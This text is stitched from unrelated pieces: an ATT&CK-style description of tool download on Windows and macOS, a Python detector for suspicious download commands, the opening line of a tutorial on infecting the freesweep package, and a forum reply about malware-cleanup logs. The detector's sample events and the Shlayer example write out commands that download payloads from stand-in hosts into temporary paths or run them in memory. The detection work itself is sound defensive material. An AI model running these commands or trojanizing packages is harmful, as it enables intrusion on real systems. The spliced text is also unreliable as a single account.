On Windows, adversaries may use built-in utilities to download tools, such as copy, finger, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a comparable set of utilities exists, such as curl, scp, sftp, tftp, rsync, finger, and wget. Because these are legitimate, already-present binaries, detection rests on the command line (the remote source, the destination path, in-memory execution of the fetched content) rather than on the presence of the tool itself.
OSX/Shlayer can download payloads and extract bytes from files. It downloads malicious payloads into a temporary directory with curl -fsL "$url" >$tmp_path, where -f makes curl fail without output on an HTTP error, -s suppresses the progress meter and error messages, and -L follows redirects, so the fetch is quiet and the payload lands in a temporary path rather than somewhere a user would notice.
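As an added example, not taken from ATT&CK or from any of the tools named above, the following Python scans process-creation records for the download utilities and PowerShell idioms listed in the text, and for the Shlayer-style "quiet curl redirected into a temporary path" pattern. The sample events, the host allowlist and the record field names are constructed for illustration and are assumptions, not data from the page.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Utilities the text names as ingress-tool-transfer vehicles (plus .exe suffix).
TOOL_RE = re.compile(
    r"(?i)(?<![\w.\\/-])(copy|finger|powershell|curl|scp|sftp|tftp|rsync|wget)(?:\.exe)?(?![\w-])"
)
URL_RE = re.compile(r"(?i)\b(?:https?|ftps?|tftp)://[^\s'\"<>)]+")
UNC_RE = re.compile(r"\\\\[\w.-]+\\[^\s'\"]+")           # copy \\host\share\file
SCP_RE = re.compile(r"\b[\w.-]+@[\w.-]+:[^\s'\"]*")       # scp/rsync user@host:path
INMEMORY_PS_RE = re.compile(r"(?i)\bIEX\b.*New-Object\s+Net\.WebClient.*downloadString")
IWR_RE = re.compile(r"(?i)\bInvoke-WebRequest\b")
# Temp/staging locations: /tmp, $tmp_path-style variables, %TEMP%, Users\Public, ProgramData.
STAGING_RE = re.compile(
    r"(?i)(?:/tmp/|/var/tmp/|/private/tmp/|\$tmp|%temp%|\$env:temp|\\Users\\Public\\|\\ProgramData\\)"
)
CURL_SILENT_RE = re.compile(r"(?:^|\s)-[A-Za-z]*s[A-Za-z]*(?=\s|$)")  # -s bundled with other flags

# Assumed allowlist of internal endpoints that legitimately get fetched (hypothetical).
ALLOWED_HOSTS = {"internal.example"}

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).downloadString('http://203.0.113.5/a.ps1')\""},
    {"host": "ws02", "user": "bob",
     "cmdline": r"powershell.exe Invoke-WebRequest -Uri http://203.0.113.5/t.exe -OutFile C:\Users\Public\t.exe"},
    {"host": "mac01", "user": "carol",
     "cmdline": 'curl -fsL "http://203.0.113.5/p" >/tmp/ab12.tmp'},          # Shlayer-style
    {"host": "srv01", "user": "root",
     "cmdline": "wget -q http://198.51.100.9/x.sh -O /tmp/x.sh"},
    {"host": "ws03", "user": "dave",
     "cmdline": "powershell.exe Get-Process"},                                # benign: no fetch
    {"host": "srv02", "user": "deploy",
     "cmdline": "curl -s https://internal.example/health"},                   # benign: allowlisted
    {"host": "srv03", "user": "deploy",
     "cmdline": "scp deploy@198.51.100.9:/opt/t.sh /tmp/t.sh"},
]


def remote_source(cmd: str) -> Optional[str]:
    """First remote source (URL, UNC path or scp-style host:path) in the command line."""
    for rx in (URL_RE, UNC_RE, SCP_RE):
        m = rx.search(cmd)
        if m:
            return m.group(0)
    return None


def classify(event: dict) -> Optional[dict]:
    """Return a finding for one record, or None when nothing suspicious is present."""
    cmd = event["cmdline"]
    tool = TOOL_RE.search(cmd)
    if tool is None:
        return None
    src = remote_source(cmd)
    if src is None:
        return None                       # the utility ran but fetched nothing remote
    if URL_RE.match(src) and urlsplit(src).hostname in ALLOWED_HOSTS:
        return None                       # known-good internal endpoint
    tool_name = tool.group(1).lower()
    reasons = [f"remote source {src}"]
    severity = "medium"
    if INMEMORY_PS_RE.search(cmd):
        reasons.append("in-memory PowerShell download (IEX + WebClient.downloadString)")
        severity = "high"                 # never touches disk; only the command line shows it
    elif IWR_RE.search(cmd):
        reasons.append("Invoke-WebRequest download")
    if tool_name == "curl" and CURL_SILENT_RE.search(cmd):
        reasons.append("curl run silently (-s), as in the Shlayer curl -fsL pattern")
    if STAGING_RE.search(cmd):
        reasons.append("payload written to a temporary/staging directory")
        severity = "high"
    return {"host": event["host"], "user": event["user"], "tool": tool_name,
            "severity": severity, "reasons": reasons}


def scan(events: list) -> list:
    """Run classify() over a batch and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"], finding["tool"], "; ".join(finding["reasons"]))
```

The two benign records show the caveat that matters in practice: a download utility on its own is not a signal, so the rule requires a remote source, drops allowlisted internal hosts, and only raises severity when the content is executed in memory or lands in a temp or staging path.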
We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Minesweeper.
I deleted the custom contents of the hosts file when requested; it was old stuff (this is a decade-old Windows system) and there's nothing there anymore, as you can see in the untouched ckfiles.txt you requested, hence I haven't needed to modify anything in the files provided by FRST (otherwise I could have removed the Adobe apps there as well). The Adobe apps on my system are genuine, downloaded directly from Adobe, and licensed (see screenshot); these are, again, decade-old apps for which license transfers are allowed.